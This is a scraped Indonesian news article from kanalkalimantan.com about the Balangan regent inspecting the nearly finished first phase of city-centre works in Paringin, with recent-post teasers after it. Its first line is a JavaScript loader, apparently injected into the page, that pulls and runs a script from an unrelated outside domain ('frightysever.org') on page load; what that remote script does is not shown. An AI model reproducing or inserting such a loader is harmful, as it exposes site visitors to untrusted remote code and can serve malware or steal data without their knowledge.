(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

Pembangunan Infrastruktur Pusat Kota Paringin Menuju Tahap Dua 2024


KANALKALIMANTAN.COM, PARINGIN – Forkopimda Balangan terus melakukan pengawasan progres pembangunan infrastruktur di pusat kota Paringin Kabupaten Balangan.

Bupati Balangan H Abdul Hadi melakukan peninjauan bersama stakeholder dan dinas terkait terhadap pekerjaan tahap satu yang hampir mencapai batas akhir, kemarin Rabu (27/12/2023).

H Abdul Hadi menyatakan, bahwa meskipun sebagian besar pekerjaan telah selesai, beberapa bagian masih memerlukan perbaikan lebih lanjut.

Menurutnya, tahap finishing menjadi krusial, dimana setiap detail harus rapi dan bersih sesuai dengan rencana dan harapan yang telah ditetapkan.

Baca juga: Polisi Selidiki Laka Maut U Turn Km 29 Guntung Payung, Pengemudi Fortuner 16 Tahun Diperiksa

“Pada Taman Sanggam, pemasangan keramik harus dijaga kebersihannya, mengingat bahwa pembangunan di pusat kota ini merupakan wajah ibu kota kabupaten, sehingga setiap detil harus rapi dan bersih,”  kata Abdul Hadi.

Untuk tahap finishing tidak hanya berkaitan dengan aspek estetika, tetapi juga menjadi representasi dari komitmen untuk memberikan standar kualitas yang tinggi pada infrastruktur kota.

Ia menyampaikan harapannya agar pekerjaan pembangunan tahap satu ini dapat memberikan landasan yang solid untuk kelanjutan program penataan kota.

Dalam kesempatan tersebut, ia juga mengumumkan bahwa penataan kota Paringin saat ini masih berada pada tahap satu dan akan segera dilanjutkan dengan tahap dua.

Baca juga: Gegara Cipratan Genangan Air di Jalan, Lelaki 54 Tahun di Banjarmasin Tusuk Pemuda

Rencananya, tahap dua akan dimulai pada awal tahun 2024, sejalan dengan perencanaan yang telah disusun pada akhir tahun 2023. Saat ini, tahap satu telah mencapai 96 persen kelengkapan, menandakan kemajuan signifikan dalam pelaksanaan program tersebut.

“Jika dalam pelaksanaan tahap dua terdapat kekurangan, kita akan kembali melanjutkan perbaikan pada tahun 2025. Ini disesuaikan dengan prinsip penataan kota Paringin yang dilakukan secara bertahap dan adaptif terhadap keadaan,” tambah Abdul Hadi.

Dalam peninjauan tersebut H Abdul Hadi tidak sendirian, Bupati Balangan didampingi oleh unsur Forkopimda, termasuk Kapolres Balangan AKBP Riza Muttaqin, Kajari Balangan Fajar Gurindro, Dandim 1001 HS/BLG Letkol Inf Dhuwi Hendradjaja, serta perwakilan dari Pengadilan Negeri Balangan dan pihak terkait lainnya.

Baca juga: Danrem 102 Kunjungan ke Kabupaten Kapuas

Sinergi antara pemerintah daerah dan lembaga terkait diharapkan dapat mengoptimalkan hasil dari program penataan kota Paringin demi kesejahteraan masyarakat. (Kanalkalimantan.com/mcbalangan/rls)

Reporter: rls
Editor: kk


Risa

Recent Posts

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

30 menit ago

Instansi Vertikal Disiapkan Masuk SKPD Instansi Mengajar di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Pendidikan (Disdik) Kota Banjarbaru siap menggandeng instansi vertikal di Kota Banjarbaru,… Read More

1 jam ago

780 Anggota PPK se Kalsel Dilantik, Bertugas 8 Bulan

KANALKALIMANTAN.COM, BANJARBARU - Seluruh Panitia Pemilihan Kecamatan (PPK) di Provinsi Kalimantan Selatan (Kalsel) resmi dilantik… Read More

2 jam ago

25 Anggota PPK Kota Banjarbaru Dilantik, Langsung Bekerja Membentuk Sekretariat

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru resmi melantik 25 orang anggota Panitia… Read More

5 jam ago

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

17 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

18 jam ago

This website uses cookies.